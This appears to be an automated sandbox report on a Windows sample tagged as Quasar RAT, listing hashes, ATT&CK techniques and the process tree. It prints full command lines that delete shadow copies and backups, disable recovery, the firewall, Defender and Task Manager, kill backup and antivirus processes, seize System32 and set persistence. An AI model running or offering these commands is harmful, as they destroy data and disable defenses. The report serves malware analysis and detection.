Analysis
-
max time kernel
151s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
11/10/2023, 05:51
Behavioral task
behavioral1
Sample
vcac.exe
Resource
win7-20230831-en
General
-
Target
vcac.exe
-
Size
24.2MB
-
MD5
a4a742b543e52358357924c02b9490c4
-
SHA1
6a8309fc0b3fc6b0747a2c5f89ef7a29428ba743
-
SHA256
bfd525cf8e0cb81260ed6a80c666491b41b456f5ad389b62089346acbe90856b
-
SHA512
fb32df097ff44c7be4549d851c8121e26c5fcd6400e8b1b095c2c38bd71214039f81be358e1e3d886a16fe92e83489ab72dacf99ef62768aca8c5aa5698010b4
-
SSDEEP
98304:GKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:L4xRBjgB7j4U6gl
Malware Config
Extracted
quasar
-
reconnect_delay
1
Signatures
-
Quasar payload 1 IoCs
resource yara_rule behavioral1/memory/2364-1-0x00000000012A0000-0x0000000002ADC000-memory.dmp family_quasar -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts vcac.exe -
Modifies Windows Firewall 1 TTPs 5 IoCs
pid Process 548 netsh.exe 1136 netsh.exe 968 netsh.exe 1652 netsh.exe 1624 netsh.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 2800 takeown.exe 744 icacls.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe vcac.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exp.exe vcac.exe -
Executes dropped EXE 3 IoCs
pid Process 2932 lm.exe 2788 mbr.exe 2660 svchost.exe -
Loads dropped DLL 10 IoCs
pid Process 2684 cmd.exe 2932 lm.exe 2932 lm.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 2800 takeown.exe 744 icacls.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\mbr.exe" mbr.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3849525425-30183055-657688904-1000\desktop.ini vcac.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 lm.exe File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\LogonUI.exe svchost.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\imageZdlQcv2yOikqjShbqQGbsviBNb6rs3.jpg" vcac.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1280 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2740 vssadmin.exe -
Kills process with taskkill 42 IoCs
pid Process 524 taskkill.exe 1328 taskkill.exe 2804 taskkill.exe 1952 taskkill.exe 2792 taskkill.exe 2136 taskkill.exe 1300 taskkill.exe 2156 taskkill.exe 1704 taskkill.exe 2312 taskkill.exe 1280 taskkill.exe 1632 taskkill.exe 1820 taskkill.exe 872 taskkill.exe 2328 taskkill.exe 1816 taskkill.exe 2984 taskkill.exe 1636 taskkill.exe 2708 taskkill.exe 2932 taskkill.exe 2300 taskkill.exe 2904 taskkill.exe 2072 taskkill.exe 1768 taskkill.exe 3048 taskkill.exe 2112 taskkill.exe 1712 taskkill.exe 1720 taskkill.exe 2944 taskkill.exe 844 taskkill.exe 2948 taskkill.exe 1532 taskkill.exe 1520 taskkill.exe 2588 taskkill.exe 2740 taskkill.exe 2072 taskkill.exe 2200 taskkill.exe 1752 taskkill.exe 1972 taskkill.exe 2496 taskkill.exe 2516 taskkill.exe 2584 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2192 reg.exe 1244 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2440 powershell.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe 2364 vcac.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeTakeOwnershipPrivilege 2800 takeown.exe Token: SeDebugPrivilege 2364 vcac.exe Token: SeBackupPrivilege 2792 taskkill.exe Token: SeRestorePrivilege 2792 taskkill.exe Token: SeAuditPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 524 taskkill.exe Token: SeIncreaseQuotaPrivilege 2804 taskkill.exe Token: SeSecurityPrivilege 2804 taskkill.exe Token: SeTakeOwnershipPrivilege 2804 taskkill.exe Token: SeLoadDriverPrivilege 2804 taskkill.exe Token: SeSystemProfilePrivilege 2804 taskkill.exe Token: SeSystemtimePrivilege 2804 taskkill.exe Token: SeProfSingleProcessPrivilege 2804 taskkill.exe Token: SeIncBasePriorityPrivilege 2804 taskkill.exe Token: SeCreatePagefilePrivilege 2804 taskkill.exe Token: SeBackupPrivilege 2804 taskkill.exe Token: SeRestorePrivilege 2804 taskkill.exe Token: SeShutdownPrivilege 2804 taskkill.exe Token: SeDebugPrivilege 2804 taskkill.exe Token: SeSystemEnvironmentPrivilege 2804 taskkill.exe Token: SeRemoteShutdownPrivilege 2804 taskkill.exe Token: SeUndockPrivilege 2804 taskkill.exe Token: SeManageVolumePrivilege 2804 taskkill.exe Token: 33 2804 taskkill.exe Token: 34 2804 taskkill.exe Token: 35 2804 taskkill.exe Token: SeIncreaseQuotaPrivilege 2804 taskkill.exe Token: SeSecurityPrivilege 2804 taskkill.exe Token: SeTakeOwnershipPrivilege 2804 taskkill.exe Token: SeLoadDriverPrivilege 2804 taskkill.exe Token: SeSystemProfilePrivilege 2804 taskkill.exe Token: SeSystemtimePrivilege 2804 taskkill.exe Token: SeProfSingleProcessPrivilege 2804 taskkill.exe Token: SeIncBasePriorityPrivilege 2804 taskkill.exe Token: SeCreatePagefilePrivilege 2804 taskkill.exe Token: SeBackupPrivilege 2804 taskkill.exe Token: SeRestorePrivilege 2804 taskkill.exe Token: SeShutdownPrivilege 2804 taskkill.exe Token: SeDebugPrivilege 2804 taskkill.exe Token: SeSystemEnvironmentPrivilege 2804 taskkill.exe Token: SeRemoteShutdownPrivilege 2804 taskkill.exe Token: SeUndockPrivilege 2804 taskkill.exe Token: SeManageVolumePrivilege 2804 taskkill.exe Token: 33 2804 taskkill.exe Token: 34 2804 taskkill.exe Token: 35 2804 taskkill.exe Token: SeDebugPrivilege 2328 taskkill.exe Token: SeDebugPrivilege 2136 taskkill.exe Token: SeDebugPrivilege 1752 taskkill.exe Token: SeDebugPrivilege 2072 taskkill.exe Token: SeDebugPrivilege 1300 taskkill.exe Token: SeDebugPrivilege 1532 taskkill.exe Token: SeDebugPrivilege 1768 taskkill.exe Token: SeDebugPrivilege 1816 taskkill.exe Token: SeDebugPrivilege 2156 taskkill.exe Token: SeDebugPrivilege 3048 taskkill.exe Token: SeDebugPrivilege 2112 taskkill.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1520 taskkill.exe Token: SeDebugPrivilege 2984 taskkill.exe Token: SeDebugPrivilege 1704 taskkill.exe Token: SeDebugPrivilege 1712 taskkill.exe Token: SeDebugPrivilege 1972 taskkill.exe Token: SeDebugPrivilege 1636 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 2644 2364 vcac.exe 28 PID 2364 wrote to memory of 2644 2364 vcac.exe 28 PID 2364 wrote to memory of 2644 2364 vcac.exe 28 PID 2364 wrote to memory of 2644 2364 vcac.exe 28 PID 2364 wrote to memory of 2684 2364 vcac.exe 30 PID 2364 wrote to memory of 2684 2364 vcac.exe 30 PID 2364 wrote to memory of 2684 2364 vcac.exe 30 PID 2364 wrote to memory of 2684 2364 vcac.exe 30 PID 2684 wrote to memory of 2932 2684 cmd.exe 32 PID 2684 wrote to memory of 2932 2684 cmd.exe 32 PID 2684 wrote to memory of 2932 2684 cmd.exe 32 PID 2684 wrote to memory of 2932 2684 cmd.exe 32 PID 2364 wrote to memory of 2788 2364 vcac.exe 33 PID 2364 wrote to memory of 2788 2364 vcac.exe 33 PID 2364 wrote to memory of 2788 2364 vcac.exe 33 PID 2364 wrote to memory of 2788 2364 vcac.exe 33 PID 2364 wrote to memory of 2660 2364 vcac.exe 34 PID 2364 wrote to memory of 2660 2364 vcac.exe 34 PID 2364 wrote to memory of 2660 2364 vcac.exe 34 PID 2364 wrote to memory of 2660 2364 vcac.exe 34 PID 2788 wrote to memory of 1280 2788 mbr.exe 35 PID 2788 wrote to memory of 1280 2788 mbr.exe 35 PID 2788 wrote to memory of 1280 2788 mbr.exe 35 PID 2788 wrote to memory of 1280 2788 mbr.exe 35 PID 2660 wrote to memory of 1988 2660 svchost.exe 38 PID 2660 wrote to memory of 1988 2660 svchost.exe 38 PID 2660 wrote to memory of 1988 2660 svchost.exe 38 PID 1988 wrote to memory of 2800 1988 cmd.exe 40 PID 1988 wrote to memory of 2800 1988 cmd.exe 40 PID 1988 wrote to memory of 2800 1988 cmd.exe 40 PID 1988 wrote to memory of 744 1988 cmd.exe 41 PID 1988 wrote to memory of 744 1988 cmd.exe 41 PID 1988 wrote to memory of 744 1988 cmd.exe 41 PID 2364 wrote to memory of 2848 2364 vcac.exe 42 PID 2364 wrote to memory of 2848 2364 vcac.exe 42 PID 2364 wrote to memory of 2848 2364 vcac.exe 42 PID 2364 wrote to memory of 2848 2364 vcac.exe 42 PID 2364 wrote to memory of 2872 2364 vcac.exe 43 PID 2364 wrote to memory of 2872 2364 vcac.exe 43 PID 2364 wrote to memory of 2872 2364 vcac.exe 43 PID 2364 wrote to memory of 2872 2364 vcac.exe 43 PID 2364 wrote to memory of 2900 2364 vcac.exe 46 PID 2364 wrote to memory of 2900 2364 vcac.exe 46 PID 2364 wrote to memory of 2900 2364 vcac.exe 46 PID 2364 wrote to memory of 2900 2364 vcac.exe 46 PID 2848 wrote to memory of 524 2848 cmd.exe 48 PID 2848 wrote to memory of 524 2848 cmd.exe 48 PID 2848 wrote to memory of 524 2848 cmd.exe 48 PID 2848 wrote to memory of 524 2848 cmd.exe 48 PID 2872 wrote to memory of 1624 2872 cmd.exe 50 PID 2872 wrote to memory of 1624 2872 cmd.exe 50 PID 2872 wrote to memory of 1624 2872 cmd.exe 50 PID 2872 wrote to memory of 1624 2872 cmd.exe 50 PID 2900 wrote to memory of 2740 2900 cmd.exe 94 PID 2900 wrote to memory of 2740 2900 cmd.exe 94 PID 2900 wrote to memory of 2740 2900 cmd.exe 94 PID 2900 wrote to memory of 2740 2900 cmd.exe 94 PID 2900 wrote to memory of 2804 2900 cmd.exe 97 PID 2900 wrote to memory of 2804 2900 cmd.exe 97 PID 2900 wrote to memory of 2804 2900 cmd.exe 97 PID 2900 wrote to memory of 2804 2900 cmd.exe 97 PID 2848 wrote to memory of 2328 2848 cmd.exe 56 PID 2848 wrote to memory of 2328 2848 cmd.exe 56 PID 2848 wrote to memory of 2328 2848 cmd.exe 56 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\vcac.exe"C:\Users\Admin\AppData\Local\Temp\vcac.exe"1⤵
- Drops file in Drivers directory
- Drops startup file
- Loads dropped DLL
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat2⤵PID:2644
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2684 -
C:\Users\Admin\AppData\Roaming\lm.exelm.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2932
-
-
-
C:\Users\Admin\AppData\Roaming\mbr.exe"C:\Users\Admin\AppData\Roaming\mbr.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"3⤵
- Creates scheduled task(s)
PID:1280
-
-
-
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"3⤵
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant "Admin:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:744
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*2⤵
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentBrowser*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecDiveciMediaService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecJobEngine*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecManagementService*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM vss*3⤵
- Kills process with taskkill
PID:2072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sql*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM svc$*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM memtas*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM backup*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxVss*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxBlr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxFWD*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCVD*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM GxCIMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM DefWatch*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM ccEvtMgr*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM SavRoam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM RTVscan*3⤵
- Kills process with taskkill
PID:2944
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBFCService*3⤵
- Kills process with taskkill
PID:2496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM Intuit.QuickBooks.FCS*3⤵
- Kills process with taskkill
PID:2932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooBackup*3⤵
- Kills process with taskkill
PID:2708
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM YooIT*3⤵
- Kills process with taskkill
PID:2516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM zhudongfangyu*3⤵
- Kills process with taskkill
PID:1280
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM sophos*3⤵
- Kills process with taskkill
PID:2300
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM stc_raw_agent*3⤵
- Kills process with taskkill
PID:2904
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VSNAPVSS*3⤵
- Kills process with taskkill
PID:2584
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM QBCFMonitorService*3⤵
- Kills process with taskkill
PID:2200
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamTransportSvc*3⤵
- Kills process with taskkill
PID:2588
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamDeploymentService*3⤵
- Kills process with taskkill
PID:1632
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM VeeamNFSSvc*3⤵
- Kills process with taskkill
PID:2740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM veeam*3⤵
- Kills process with taskkill
PID:2312
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM PDVFSService*3⤵
- Kills process with taskkill
PID:1328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecVSSProvider*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecAgentAccelerator*3⤵
- Kills process with taskkill
PID:844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM BackupExecRPCService*3⤵
- Kills process with taskkill
PID:2948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcrSch2Svc*3⤵
- Kills process with taskkill
PID:1820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM AcronisAgent*3⤵
- Kills process with taskkill
PID:872
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CASAD2DWebSvc*3⤵
- Kills process with taskkill
PID:1952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM CAARCUpdateSvc*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM TeamViewer*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:1624
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
PID:548
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
PID:1136
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
PID:968
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
PID:1652
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2936
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
PID:2192
-
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
PID:1244
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionExtension .exe3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet2⤵
- Suspicious use of WriteProcessMemory
PID:2900 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:2740
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵PID:2804
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:2792
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
685KB
MD5081d9558bbb7adce142da153b2d5577a
SHA17d0ad03fbda1c24f883116b940717e596073ae96
SHA256b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3
SHA5122fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511
-
Filesize
111KB
MD5b59b0f6193bcc7e78a3b2fc730196be3
SHA1045469fec2df2a9c75b550984a0ed32db2e9f846
SHA256003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b
SHA51273cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97
-
Filesize
512B
MD521bbc91fb1bc04deecca398cc526b989
SHA19579ac63a28ff2e037e69f0812cbfa42532e90f6
SHA256389b11feaf1aa87d1ddd9dfe5d368bc226c1da774ad5ec422b9997b29d359b48
SHA512747cacb3558de0104bc0d98f2cb9b64cb495ce07bf4e55257f8073835f2c43e467ab52b676a61d889c3f8079cb20d5552d6c349da6fa6103d18da7166054abb4
-
Filesize
39KB
MD586e3192ad129a388e4f0ac864e84df78
SHA170a2b1422b583c2d768a6f816905bc85687ced52
SHA2564f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3
SHA512f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b
-
Filesize
39KB
MD586e3192ad129a388e4f0ac864e84df78
SHA170a2b1422b583c2d768a6f816905bc85687ced52
SHA2564f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3
SHA512f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b
-
Filesize
101KB
MD500e306f18b8cc56f347f34a7ebaf7f9f
SHA12bd080cc517e906942f3f7fcb4b88ec1653ef5bc
SHA256ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e
SHA5122204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d
-
Filesize
101KB
MD500e306f18b8cc56f347f34a7ebaf7f9f
SHA12bd080cc517e906942f3f7fcb4b88ec1653ef5bc
SHA256ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e
SHA5122204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d
-
Filesize
67B
MD5a204d9e5059a5449af7af765d371d6ea
SHA1cfc6f78545bdc6a1c82491500f1bacfb38bef28c
SHA256d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26
SHA512d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92
-
Filesize
41KB
MD584177654d8bbd32fe8132265e7a598ec
SHA173bbb239d1449b3af2d7f53614ba456c1add4c9a
